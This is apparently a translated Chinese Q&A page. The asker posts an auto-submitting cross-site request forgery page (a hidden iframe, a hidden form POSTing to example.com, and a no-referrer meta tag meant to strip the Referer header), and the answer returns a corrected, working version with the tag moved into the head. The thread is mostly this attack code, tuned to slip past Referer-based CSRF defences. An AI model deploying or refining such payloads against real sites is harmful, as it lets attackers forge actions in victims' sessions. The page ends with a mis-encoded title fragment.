Question

我试图制作一个csrf script来发送post request而不发送referrer。我的代码：

<html>
<body>
<meta name="referrer" content="no-referrer">
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://www.example.com/test.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='x' value='y'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>

我尝试使用此元标记：<meta name="referrer" content="no-referrer"> 但是没有成功，在帖子请求中仍然有推荐人。

Answer 1

我认为这里的问题是您将<meta>标记放在正文中。但是，<meta>标记始终应该放在<head>元素内。您可能想要输入以下代码：

<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer">
</head>
<body>
  <iframe style="display:none" name="csrf-frame"></iframe>
  <form method='POST' action='https://www.example.com/test.php' target="csrf-frame" id="csrf-form">
    <input type='hidden' name='x' value='y'>
    <input type='submit' value='submit'>
  </form>
  <script>document.getElementById("csrf-form").submit()</script>
</body>
</html>

https://www.w3schools.com/tags/tag_meta.asp有更多相关信息。

＆＃34;无引荐＆＃34;元标记不起作用

1 个答案: